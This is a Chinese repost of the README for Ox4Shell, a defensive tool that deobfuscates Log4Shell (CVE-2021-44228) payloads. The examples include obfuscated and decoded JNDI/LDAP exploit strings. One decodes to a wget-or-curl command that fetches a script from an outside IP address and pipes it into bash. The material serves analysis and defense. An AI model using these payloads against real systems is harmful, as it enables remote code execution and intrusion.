Ox4Shell工具-轻松反混淆 Log4Shell 有效负载

用户8478399

发布于 2022-09-27 17:18:15

3820

发布于 2022-09-27 17:18:15

文章被收录于专栏：White OWL

描述

自 Log4Shell 漏洞 (CVE-2021-44228) 发布以来，创建了许多工具来混淆 Log4Shell 有效负载，使安全工程师的生活成为一场噩梦。

该工具旨在解开经过混淆的 Log4Shell 有效负载的真实内容。

例如，考虑以下经过混淆的有效负载：

${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}

运行 Ox4Shell 后，它会变成一种直观易读的形式：

${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}

此工具还有助于识别和解码 base64 命令。例如，考虑以下混淆的有效负载：

${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}

运行 Ox4Shell 后，该工具揭示了攻击者的意图：

${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash

⚠️我们建议Ox4Shell使用提供的文件 ( -f) 而不是内联有效负载 ( -p) 运行，因为某些 shell 环境会转义重要字符，因此会产生不准确的结果。

用法

要简单地运行该工具：

~/Ox4Shell » python ox4shell.py --help
usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)

   ____       _  _   _____ _          _ _ 
  / __ \     | || | / ____| |        | | |
 | |  | |_  _| || || (___ | |__   ___| | |
 | |  | \ \/ /__   _\___ \| '_ \ / _ \ | |
 | |__| |>  <   | | ____) | | | |  __/ | |
  \____//_/\_\  |_||_____/|_| |_|\___|_|_|

Ox4Shell - Deobfuscate Log4Shell payloads with ease.
    Created by https://oxeye.io

General:
  -h, --help            Show this help message and exit
  -d, --debug           Enable debug mode (default: False)
  -m MOCK, --mock MOCK  The location of the mock data JSON file that replaces certain values in the payload (default: mock.json)
  --max-depth MAX_DEPTH
                        The maximum number of iteration to perform on a given payload (default: 150)
  --decode-base64       Payloads containing base64 will be decoded (default: False)

Targets:
  Choose which target payloads to run Ox4Shell on

  -p PAYLOAD, --payload PAYLOAD
                        A single payload to deobfuscate, make sure to escape '$' signs (default: None)
  -f FILE, --file FILE  A file containing payloads delimited by newline (default: None)

模拟数据

Log4j 库有一些独特的查找功能，允许用户查找环境变量、Java 进程的运行时信息等。此功能使威胁参与者能够探测特定信息，这些信息可以唯一地识别他们所针对的受感染机器。

Ox4Shell 使用该mock.json文件将常用值插入到某些查找函数中，例如，如果有效负载包含 value ${env:HOME}，我们可以将其替换为自定义模拟值。

提供的默认模拟数据集是：

{    "hostname": "ip-127.0.0.1",    "env": {        "aws_profile": "staging",        "user": "ubuntu",        "pwd": "/opt/",        "path": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
    },    "sys": {        "java.version": "16.0.2",        "user.name": "ubuntu"
    },    "java": {        "version": "Java version 16.0.2",        "runtime": "OpenJDK Runtime Environment (build 1.8.0_181-b13) from Oracle Corporation",        "vm": "OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)",        "os": "Linux 5.10.47-linuxkit unknown, architecture: amd64-64",        "locale": "default locale: en_US, platform encoding: UTF-8",        "hw": "processors: 1, architecture: amd64-64"
    }
}

例如，我们可以使用 Ox4Shell 的模拟功能对以下有效负载进行反混淆：

~/Ox4Shell >> python ox4shell.py -p "\${jndi:ldap://\${sys:java.version}.\${env:AWS_PROFILE}.malicious.server/a}"  ${jndi:ldap://16.0.2.staging.malicious.server/a}

作者

丹尼尔·阿贝尔斯
罗恩·维德

执照

该项目的源代码在 MIT 许可证下获得许可，您可以在 LICENSE 文件中找到该许可证。

工具下载：https://github.com/ox-eye/Ox4Shell#ox4shell

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2022-08-26，如有侵权请联系 cloudcommunity@tencent.com 删除

shell

本文分享自 White OWL 微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

shell

登录后参与评论

0 条评论

热度